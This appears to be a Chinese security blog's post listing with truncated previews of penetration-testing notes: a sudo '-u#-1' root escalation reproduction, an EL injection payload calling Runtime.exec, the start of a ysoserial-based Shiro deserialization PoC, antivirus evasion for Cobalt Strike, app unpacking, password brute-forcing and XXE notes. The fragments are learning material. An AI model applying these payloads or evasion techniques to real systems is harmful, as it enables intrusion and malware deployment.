漏洞复现    2019-10-15 10:03:29    12    0    0
漏洞分析 早上看到 Open Source Security 推送了 sudo的一个漏洞,打算复现下 看了下这个漏洞实际上是sudo -u 指定用户为 -1 4294967295 时,会为root权限 但是我感觉有点挺鸡肋 当前用户需要有sudo的权限才能sudo并且需要有当前用户密码 $ sudo -u#-1 iduid=0(root) gid=1000(12345) 组=1000(12345) 一些小扩展 感觉这个是linux的问题 -1 4294967295 貌似在linux中会被指定为 root 例如这个问题在su中也存在 but 需要root密码
日记    2019-09-22 16:53:25    43    0    0
前言 这个日记是用来记录我每天干了什么和没干什么,防止我忘记了 2019-9-18 今天打算开始写一些技术笔记,用来记录每天干了什么和没干什么,和打算干什么 昨天学弟给我发了一个免杀的文章打算今天研究 我看下了tql MFC框架和c语言shellcod加载 顺便打算看下Cobalt Strike的artifact kits研究下免杀最近cs被杀的太痛了。 想作的事 jeecms 低版本的Shiro研究 fastjson反序列化的研究 2019-9-19 昨天发现Cobalt Strike的artifact kits 压根不好用生成的还是被杀除非自己修
jeecms    2019-09-19 15:38:01    30    0    0
直接给代码 import osimport base64import uuidimport subprocessimport requestsimport sysfrom Crypto.Cipher import AES#JAR_FILE = 'ysoserial.jar'JAR_FILE = 'moule/ysoserial.jar'def poc(url, command): target = url try: payload4 = generator4(command, JAR_FILE) # 生成payload4 r4 = requ
特殊技巧    2019-08-06 13:58:19    33    0    0
ras加密密码的爆破 通过引入js的方式 https://github.com/c0ny1/jsEncrypter/ 这个是burp插件 用来调用本地监听的数据 编写本地的phantomjs_server.js 一个例子 /** * author: c0ny1 * date: 2017-12-16 */var webserver = require('webserver');server = webserver.create();var host = '127.0.0.1';var port = '1664';// 加载实现加密算法的js脚本var wasSucces
awd    2019-08-06 13:58:19    95    0    0
萌新的awd瞎指 数据库篇 mysqldump -u root -h host -p dbname > backdb.sql 备份mysql -u root -p [dbname] < backup.sql# 执行前需要先创建dbname数据库,如果backup.sql是mysqldump创建的备份文件则执行是不需要dbname。mysql> source backup.sql;# 执行source命令前需要先选择数据库。可以考虑 mysql安全初始化 不过看起来没啥用 而且可能存在权限问题mysql_secure_installation--为root用户设
特殊技巧    2019-08-06 13:58:19    38    0    0
利用zmap+Zgrab绕过cdn 首先是安装zmap github上zmap项目中给各系统的安装方法 OS Debian and Ubuntu sudo apt install zmap Fedora, CentOS, and RHEL sudo yum install zmap Gentoo sudo emerge zmap macOS (using Homebrew) brew install zmap Arch Linux sudo pacman -S zmap 没有什么好说的 接下来就
漏洞记录    2019-08-06 13:58:19    29    0    0
EL表达式注入 简单描述 EL表达式语法允许开发人员开发自定义函数,以调用Java类的方法 测试方法 尝试使用 ${1000-900} #我看乌云上猪猪侠的jcnfl${"ztz".toString().replace("t", "h")}h8wgf #应该是扫描器的 这种类似的方式来检测 看会不会返回计算后的值 100jcnflzhzh8wgf 利用方式 ${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec
2019-08-06 13:58:19    53    0    0
360新版加固脱壳记录 0x00 前言 最近想日一个站,主站没找到突破口,只能app找了,但是app http流量内容各种加密,只能先逆向app了。 app是360新版加固 drizzleDumper脱壳没成功,后来换了BUnpacker才成功脱壳 0x01 失败的尝试 先拉下来直接跑,各种报错,然后发现是AXMLPrinter2.jar无法运行,然后想办法规避错误 代码片段为 ... nxml = open('tmp/nxml.xml','w') zf = zipfile.ZipFile(APK_PATH, 'r') con
测试日常    2019-08-06 13:58:19    12    0    0
一个前端加密的测试 起 周五 现场老哥丢给我个链接让我帮忙测个短信炸弹 http://xxxxxxxx:7270/xxxxxxx/index.html#!login 拿到链接直接抓包 仔细一看 蒙蔽了 全加密流量 POST /xxxxxESOPHTML5xxxxxxx/getDynamicPwd HTTP/1.1Host: xxxxxxxContent-Length: 541Origin: xxxxxxxbipcode: getDynamicPwdUser-Agent: Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58
学习笔记    2019-08-06 13:58:19    15    0    0
萌新的xxe 0x0 前言 ​ 最近准备去打ctf,为了防止被暴打,准备抽空刷点题,正好刷到了xxe的题,就记一下。 0x01 xml格式 <!--XML申明--><?xml version="1.0"?> <!--文档类型定义--><!DOCTYPE note [ <!--定义此文档是 note 类型的文档--><!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素--><!ELEMENT to (#PCDAT